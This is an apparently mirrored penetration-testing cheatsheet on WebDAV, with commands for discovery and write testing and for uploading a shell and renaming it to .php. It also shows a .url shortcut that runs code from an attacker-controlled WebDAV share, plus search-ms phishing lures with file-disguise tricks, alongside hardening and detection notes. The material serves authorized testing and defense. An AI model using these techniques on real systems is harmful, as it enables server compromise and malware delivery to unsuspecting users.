daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

put-method-webdav.md (14642B)


      1 ---
      2 title: "WebDAV"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-web/put-method-webdav.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/put-method-webdav.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # WebDAV
     14 
     15 When an **HTTP server with WebDAV** exposes write-capable collections, an authorized principal may create, copy, move, or delete resources according to the server's access controls. Authentication may use Basic, Digest, NTLM/Kerberos, client certificates, or an application-specific mechanism; Basic is common in labs but is not required by WebDAV. If a writable collection is also mapped to a server-side script engine, an uploaded file may become code execution.<sup>[[1]](#references)[[5]](#references)</sup>
     16 
     17 Access normally requires **valid credentials**. During an authorized assessment, test the applicable authentication scheme and lockout policy; the [HTTP Basic authentication testing notes](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-hacking/brute-force.md#http-basic-auth) apply only when Basic is actually offered.
     18 
     19 ## Discovery and write-capability verification
     20 
     21 Start with `OPTIONS`, but treat `Allow`/`Public` headers only as an implementation hint: a method can be advertised but denied to the current principal, hidden from the header yet routed by another component, or permitted only below a particular collection. Nmap's `http-webdav-scan` combines `OPTIONS` with `PROPFIND` and may also expose internal names returned in DAV XML.<sup>[[6]](#references)</sup>
     22 
     23 ```bash
     24 nmap -p80,443 --script http-webdav-scan \
     25   --script-args http-webdav-scan.path='/dav/' <target>
     26 curl -isku 'user:password' -X OPTIONS 'https://target.example/dav/'
     27 curl -isku 'user:password' -X PROPFIND -H 'Depth: 0' \
     28   -H 'Content-Type: application/xml' --data '<?xml version="1.0"?><propfind xmlns="DAV:"><prop><resourcetype/><getcontenttype/><getetag/></prop></propfind>' \
     29   'https://target.example/dav/'
     30 curl -isku 'user:password' -X PROPFIND -H 'Depth: 1' \
     31   'https://target.example/dav/'
     32 ```
     33 
     34 `Depth: 0` fingerprints one resource and `Depth: 1` enumerates its immediate children; a successful response is normally `207 Multi-Status`, so parse the per-resource `<status>` elements rather than relying only on the outer status. Avoid `Depth: infinity` on production trees because recursive traversal can be expensive.<sup>[[5]](#references)</sup>
     35 
     36 Test each write primitive with a unique marker in a disposable collection. `Overwrite: F` prevents `COPY`/`MOVE` from replacing an existing destination; `201` usually means creation, `204` means an existing destination was overwritten, and `412` is expected when overwrite was refused. Always GET/PROPFIND the destination and compare the bytes instead of trusting a client's summary.<sup>[[5]](#references)</sup>
     37 
     38 ```bash
     39 base='https://target.example/dav'; auth='user:password'; n="ht-$RANDOM"
     40 printf 'webdav-marker\n' > "/tmp/$n.txt"
     41 curl -isku "$auth" -X PUT --data-binary @"/tmp/$n.txt" "$base/$n.txt"
     42 curl -isku "$auth" -X COPY -H "Destination: $base/$n.copy" -H 'Overwrite: F' "$base/$n.txt"
     43 curl -isku "$auth" -X MOVE -H "Destination: $base/$n.moved" -H 'Overwrite: F' "$base/$n.copy"
     44 curl -sku "$auth" "$base/$n.moved"; curl -isku "$auth" -X PROPFIND -H 'Depth: 0' "$base/$n.moved"
     45 curl -isku "$auth" -X DELETE "$base/$n.moved"; curl -isku "$auth" -X DELETE "$base/$n.txt"
     46 ```
     47 
     48 To overcome restrictions on file uploads, especially those preventing the execution of server-side scripts, you might:
     49 
     50 - **Upload** files with **executable extensions** directly if not restricted.
     51 - **Rename** uploaded non-executable files (like .txt) to an executable extension.
     52 - **Copy** uploaded non-executable files, changing their extension to one that is executable.
     53 
     54 ## DavTest
     55 
     56 **DAVTest** attempts to upload files with several extensions and checks whether the resulting resources are accessible or executed:
     57 
     58 ```bash
     59 davtest [-auth user:password] -move -sendbd auto -url http://<IP> # Upload .txt files and try to move them to other extensions
     60 davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension
     61 ```
     62 
     63 Output sample:
     64 
     65 ![WebDav - DavTest: davtest (-auth user:password) -sendbd auto -url http:// Try to upload every extension](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28851%29.png)
     66 
     67 A successful access test for **`.txt`** or **`.html`** does not mean the server executes those extensions; it only proves that the files are retrievable.
     68 
     69 ## Cadaver
     70 
     71 Cadaver is an interactive WebDAV client for manually uploading, moving, copying, and deleting resources.
     72 
     73 ```text
     74 cadaver <IP>
     75 ```
     76 
     77 ## PUT request
     78 
     79 ```text
     80 curl -T 'shell.txt' "http://$ip/"
     81 ```
     82 
     83 ## MOVE request
     84 
     85 ```bash
     86 curl -X MOVE --header "Destination: http://$ip/shell.php" "http://$ip/shell.txt"
     87 ```
     88 
     89 ## Verb-specific path normalization and authorization
     90 
     91 WebDAV expands one endpoint into several filesystem operations, so test canonicalization and authorization **per verb**, not only with `GET`. Compare slash, backslash, encoded separator, duplicate separator, and dot-segment handling with a client that preserves the request target (for example, `curl --path-as-is`). Keep probes inside a sacrificial collection until the behavior is understood.<sup>[[5]](#references)[[7]](#references)</sup>
     92 
     93 A useful case study is the PaperCut WebDAV chain disclosed in 2024: a third-party servlet sanitized forward slashes, while Jetty passed backslashes and Windows interpreted them as separators. The mismatch made traversed `PROPFIND`, `PUT`, and `DELETE` operations possible even though a separate filter blocked `GET`. This illustrates why a GET-only security filter does not protect a DAV namespace.<sup>[[7]](#references)</sup>
     94 
     95 ```bash
     96 # Compare responses; substitute a harmless in-scope collection and marker.
     97 base='https://target.example/dav'; auth='user:password'
     98 curl --path-as-is -isku "$auth" -X PROPFIND -H 'Depth: 0' "$base/a/../probe"
     99 curl --path-as-is -isku "$auth" -X PROPFIND -H 'Depth: 0' "$base/a%5c..%5cprobe"
    100 curl --path-as-is -isku "$auth" -X PROPFIND -H 'Depth: 0' "$base/a\\..\\probe"
    101 ```
    102 
    103 `COPY` and `MOVE` have **two authorization targets**: the Request-URI source and the `Destination` URI. Test that normalization, tenant boundaries, and access control are applied to both, and compare absolute-URI and same-origin destination forms accepted by the deployment. Use `Overwrite: F` and unique names while testing to prevent unintended replacement.<sup>[[5]](#references)</sup>
    104 
    105 Hardening should disable unused DAV verbs, keep writable DAV storage outside executable web roots, reject ambiguous separators before routing, authorize only after a single canonicalization step, and enforce the same containment rules on the source and destination. Limit recursive `PROPFIND`, XML body size, upload size, and storage quota to reduce denial-of-service impact.<sup>[[5]](#references)[[7]](#references)</sup>
    106 
    107 ## IIS5/6 WebDav Vulnerability
    108 
    109 Historical IIS 5/6 deployments could combine WebDAV extension filtering with wildcard ASP mappings in a way that rejected a direct `.asp` upload but treated a name such as `.asp;.txt` as executable ASP. This depends on obsolete IIS/script-map configuration and should not be expected on current IIS.<sup>[[5]](#references)</sup>
    110 
    111 In a vulnerable lab, upload the payload as `.txt`, then copy or move it to an `.asp;.txt` name and request that resource. Some clients may report the MOVE as failed even though the destination was created, so verify with `PROPFIND` or a subsequent GET rather than trusting one status display.
    112 
    113 ![MOVE request - IIS5/6 WebDav Vulnerability: Then you can upload your shell as a ". txt" file and copy/move it to a ".asp;.txt" file. An accessing that file through the web server, it...](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%281092%29.png)
    114 
    115 ## Post credentials
    116 
    117 After obtaining authorized host access to an Apache WebDAV server, inspect its enabled virtual-host configuration. A common path is:\
    118 _**/etc/apache2/sites-enabled/000-default**_
    119 
    120 Inside it you could find something like:
    121 
    122 ```text
    123 ServerAdmin webmaster@localhost
    124         Alias /webdav /var/www/webdav
    125         <Directory /var/www/webdav>
    126                 DAV On
    127                 AuthType Digest
    128                 AuthName "webdav"
    129                 AuthUserFile /etc/apache2/users.password
    130                 Require valid-user
    131 ```
    132 
    133 The `AuthUserFile` directive identifies the password file used for this directory:
    134 
    135 ```text
    136 /etc/apache2/users.password
    137 ```
    138 
    139 Such files contain usernames and password verifiers, not plaintext passwords. Preserve permissions and crack or modify them only within the engagement scope.
    140 
    141 With authorization, you can audit a verifier or add/update an account:
    142 
    143 ```bash
    144 htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password
    145 ```
    146 
    147 To check if the new credentials are working you can do:
    148 
    149 ```bash
    150 wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q
    151 ```
    152 
    153 ## Client-side WebDAV delivery and execution
    154 
    155 WebDAV is also useful on the **client side**: Windows can treat a remote WebDAV location as a **working directory**, an **Explorer search location**, or a **document lure** instead of only as a server-side upload target. Common remote path forms are ordinary UNC paths and WebDAV-specific paths such as `\\host@80\share` or `\\host@ssl@443\DavWWWRoot\share`. When Windows resolves them it will usually start the **WebClient** service and generate **`davclnt.dll`** network traffic.<sup>[[2]](#references)</sup>
    156 
    157 ### Internet Shortcut (`.url`) + remote `WorkingDirectory`
    158 
    159 An Internet Shortcut can launch a **local signed binary** while forcing its **current working directory** to an attacker-controlled WebDAV share. If that parent process later starts a child **by bare filename** (for example `route.exe` instead of `C:\Windows\System32\route.exe`), Windows may resolve and execute the remote file from WebDAV first.
    160 
    161 This was highlighted by **CVE-2025-33053**. Patched Windows releases address the documented chain, but the general audit lesson remains: a binary that resolves children or dependencies from an attacker-controlled working directory can become a remote search-path execution gadget.<sup>[[3]](#references)[[4]](#references)</sup>
    162 
    163 ```ini
    164 [InternetShortcut]
    165 URL=C:\Program Files\Internet Explorer\iediagcmd.exe
    166 WorkingDirectory=\\attacker@ssl@443\DavWWWRoot\share
    167 ShowCommand=7
    168 IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    169 IconIndex=13
    170 ```
    171 
    172 Abuse notes:
    173 
    174 - The remote payload must use the **exact** child/dependency name requested by the parent (`route.exe`, `netsh.exe`, `ping.exe`, etc.).
    175 - Good candidates are binaries that **run without mandatory arguments** and later call `ShellExecute`/`CreateProcess` with a **bare name**. If the binary uses a **fully qualified path**, the working-directory substitution normally fails.
    176 - `ShowCommand=7` starts the signed binary minimized, while `IconFile` and `IconIndex` can make the `.url` look like a PDF/browser/document shortcut.
    177 - This is a remote variant of **search-path hijacking**: conceptually similar to [DLL hijacking / weak search-path issues](/hacktricks/windows-hardening/windows-local-privilege-escalation/dll-hijacking/overview), but with the attacker-controlled search location hosted over WebDAV.
    178 
    179 For lab discovery, create several `.url` files that all point their `WorkingDirectory` to the same WebDAV share, then upload harmless test executables named after likely child processes/dependencies. Any shortcut that launches the remote test binary identifies another candidate LOLBin.
    180 
    181 ### `search-ms:` and `.library-ms` WebDAV/UNC lures
    182 
    183 Instead of downloading a file directly, a phishing page can make **Explorer** render a remote WebDAV directory as search results:
    184 
    185 ```text
    186 search-ms:displayname=Search Results in \\attacker@80\Downloads\Docs&query=*.scr&crumb=location:\\attacker@80\Downloads\Docs
    187 ```
    188 
    189 This makes the remote file look like an **Explorer result** instead of a normal browser download. Operators commonly combine this with:<sup>[[2]](#references)</sup>
    190 
    191 - **RTLO / `U+202E`**
    192 - **Double extensions** such as `report.pdf.scr`
    193 - **Whitespace padding** before `.exe`/`.scr`
    194 - **Fake PDF / Office / browser icons**
    195 
    196 Similar delivery can use **`.library-ms`** files that point to external UNC/WebDAV locations. For more general document-lure ideas see [Phishing Files & Documents](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md), and for the **NTLM-leak** side of `.library-ms` / shortcut abuse see [Places to steal NTLM creds](/hacktricks/windows-hardening/ntlm/places-to-steal-ntlm-creds).
    197 
    198 ### Detection ideas
    199 
    200 - `.url` files containing `WorkingDirectory=\\\\...@80\\`, `@ssl@443`, or `DavWWWRoot`
    201 - **WebClient** service start events followed by **`davclnt.dll`** network activity
    202 - Trusted Windows binaries spawning children whose **image path** is a **UNC/WebDAV** location
    203 - Explorer/browser activity that immediately opens **`search-ms:`** or **`.library-ms`** references to external shares
    204 - Remote executables masquerading as documents via **RTLO**, **double extensions**, or **long whitespace padding**<sup>[[2]](#references)</sup>
    205 
    206 
    207 ## References
    208 
    209 - [1] [Exploiting WebDAV](https://vk9-sec.com/exploiting-webdav/)
    210 - [2] [Rapid7 - Inside an Exposed Malware Delivery Lab: OPSEC Failures Behind a WebDAV Phishing Operation](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)
    211 - [3] [NVD - CVE-2025-33053](https://nvd.nist.gov/vuln/detail/CVE-2025-33053)
    212 - [4] [Stealth Falcon's Exploit of Microsoft Zero Day Vulnerability - Check Point Research](https://research.checkpoint.com/2025/stealth-falcon-zero-day/)
    213 - [5] [RFC 4918 - HTTP Extensions for Web Distributed Authoring and Versioning (WebDAV)](https://www.rfc-editor.org/rfc/rfc4918)
    214 - [6] [Nmap `http-webdav-scan` NSE documentation](https://nmap.org/nsedoc/scripts/http-webdav-scan.html)
    215 - [7] [Writeup for CVE-2023-39143: PaperCut WebDAV Vulnerability](https://horizon3.ai/attack-research/disclosures/writeup-for-cve-2023-39143-papercut-webdav-vulnerability/)